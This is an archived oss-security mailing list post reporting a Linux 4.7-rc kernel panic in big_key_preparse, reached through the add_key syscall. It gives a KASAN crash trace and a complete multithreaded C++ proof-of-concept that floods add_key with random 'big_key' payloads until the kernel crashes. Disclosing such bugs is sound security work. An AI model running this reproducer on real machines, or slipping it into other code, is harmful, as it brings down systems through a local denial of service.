Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Fri, 22 Jul 2016 22:54:09 +0800
From: <zer0mem@...oo.com>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Cc: "cve-assign@...re.org" <cve-assign@...re.org>, 
	Marco Grassi <marco.gra@...il.com>
Subject: panic at big_key_preparse #4.7-r6/rc7 & master

Hi,

Following code will panic 4.7-rc6/rc7 & master

However will not panic at latest stable 4.6.4 kernel apparently


qemu + kasan

“””

/*

author : @zer0mem

Qilin : v3.2 [ linux ]
Reproducer : v1.0

KASAN : active
KTSAN : non-active

Linux Kernel version : 4.7

compile : clang++-3.8 -std=c++1y poc.cpp -lpthread -o big_key_poc

issue : add_key -> "big_key"

[94011.624218] kasan: CONFIG_KASAN_INLINE enabled
[94011.624507] kasan: GPF could be caused by NULL-ptr deref or user memory access
[94011.624930] general protection fault: 0000 [#1] SMP KASAN
[94011.625234] Modules linked in:
[94011.625421] CPU: 0 PID: 13245 Comm: a.out Tainted: G    B           4.7.0-rc6+ #9
[94011.625837] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[94011.626363] task: ffff880013b1d580 ti: ffff8800693d8000 task.ti: ffff8800693d8000
[94011.626778] RIP: 0010:[<ffffffff819e6e64>]  [<ffffffff819e6e64>] big_key_preparse+0x1a4/0x540
[94011.627262] RSP: 0018:ffff8800693dfc90  EFLAGS: 00010206
[94011.627559] RAX: dffffc0000000000 RBX: ffff8800693dfdc8 RCX: 0000000000000000
[94011.627956] RDX: 0000000000000009 RSI: 0000000000000000 RDI: 0000000000000048
[94011.628356] RBP: ffff8800693dfcc8 R08: ffffed000d27bfc2 R09: ffff8800693dfdc8
[94011.628752] R10: ffff8800693dfe0f R11: ffffed000d27bfc2 R12: 0000000000000000
[94011.629149] R13: 0000000000000f50 R14: ffff8800693dfe48 R15: ffff8800693dfdf0
[94011.629547] FS:  00007faf577fe700(0000) GS:ffff88006d200000(0000) knlGS:0000000000000000
[94011.629994] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[94011.630361] CR2: 0000000000609000 CR3: 000000006a9bd000 CR4: 00000000000006f0
[94011.630812] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[94011.631223] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[94011.631633] Stack:
[94011.631755]  ffff8800693dfdc8 0000000000000048 ffffffff819e6cc0 1ffff1000d27bfa5
[94011.632349]  ffffffffffffffec ffff8800693dfe48 ffff88005098b400 ffff8800693dfe70
[94011.633063]  ffffffff819d5a81 0000000000000004 ffff8800693dfd30 ffff8800693dfdc8
[94011.633550] Call Trace:
[94011.633702]  [<ffffffff819e6cc0>] ? big_key_crypt+0x2a0/0x2a0
[94011.634034]  [<ffffffff819d5a81>] key_create_or_update+0x361/0xa00
[94011.634389]  [<ffffffff819d5720>] ? key_type_lookup+0xe0/0xe0
[94011.634719]  [<ffffffff815c3609>] ? ___slab_alloc+0x179/0x4c0
[94011.635050]  [<ffffffff815c5643>] ? __kmalloc+0x103/0x250
[94011.635360]  [<ffffffff819da6e4>] SyS_add_key+0x1f4/0x390
[94011.635671]  [<ffffffff819da4f0>] ? key_get_type_from_user.constprop.8+0xe0/0xe0
[94011.636106]  [<ffffffff81083d40>] ? compat_start_thread+0x90/0x90
[94011.636457]  [<ffffffff82d36af6>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[94011.636823] Code: 5c 41 5d 41 5e 41 5f 5d c3 e8 89 f1 98 ff 4c 8b 25 32 cb 47 02 48 b8 00 00 00 00 00 fc ff df 49 8d 7c 24 48 48 89 fa 48 c1 ea 03 <80> 3c 02 00 0f 85 78 03 00 00 4d 8b 64 24 48 48 b8 00 00 00 00 
[94011.638412] RIP  [<ffffffff819e6e64>] big_key_preparse+0x1a4/0x540
[94011.638775]  RSP <ffff8800693dfc90>
[94011.639205] ---[ end trace 0255e2496c208fbf ]---
[94011.639474] Kernel panic - not syncing: Fatal exception
[94011.639855] Kernel Offset: disabled
[94011.640066] ---[ end Kernel panic - not syncing: Fatal exception

*/

#include <stdint.h>

#include <memory>
#include <algorithm>
#include <functional>
#include <string>
#include <atomic>
#include <stdlib.h>
#include <vector>
#include <stdlib.h>
#include <stdio.h>

#include <thread>

#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <pthread.h>
#include <sched.h>
#include <signal.h>
#include <fcntl.h>

#include <keyutils.h>

int handles[0x10] = { 0 };
char buffer[0x1000] = { 0 };

bool rand01() { return std::rand() % 2; }

void shaka()
{
	for (size_t i = 0; i < sizeof(buffer); ++i)
		buffer[i] = std::rand() % 0xFF;

	while (true)
	{
		for (size_t i = std::rand() % sizeof(buffer); i < sizeof(buffer); ++i)
			buffer[i] = std::rand() % 0xFF;

		sleep(std::rand() % 10);
	}
}

void workers(int fd)
{
	size_t max_round = 40 + std::rand() % 200;
	for (size_t i = 0; i < max_round; i++)
	{
		switch(std::rand() % 1)
		{
			case 0 :
			{
				add_key(
					rand01() ? "user" : "big_key",
					0,
					buffer,
					std::rand() % sizeof(buffer),
					handles[std::rand() % 0x10]);

			} break;

			default:
				break;
		}		
	}
}

void ctors(int ind)
{
	handles[ind] = 0;
	while (!handles[ind])
	{
		switch(std::rand() % 1)
		{
			case 0 :
			{
				handles[ind] = add_key(
					rand01() ? "user" : "big_key",
					0,
					buffer,
					std::rand() % sizeof(buffer),
					handles[std::rand() % 0x10]);
			} break;

			default:
				break;
		}
	}
	int fd = handles[ind];
	for (size_t i = 0; i < 20; ++i, sleep(1 + std::rand() % 4))
		for (size_t j = std::rand() % 4; j; --j)
			workers(fd);
}

int main()
{
	std::thread(shaka).detach();
	for (;; sleep(std::rand() % 4))
		std::thread([]()
			{
			for (size_t i = 0; i < 0x10; ++i)
				std::thread(ctors, i).detach();		
			}).detach();
	
	return 0;
};

#include <asm/unistd.h>

#define __weak __attribute__((weak))

key_serial_t __weak add_key(const char *type,
			    const char *description,
			    const void *payload,
			    size_t plen,
			    key_serial_t ringid)
{
	return syscall(__NR_add_key,
		       type, description, payload, plen, ringid);
}


“””

Peter

Sent from Mail for Windows 10


Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.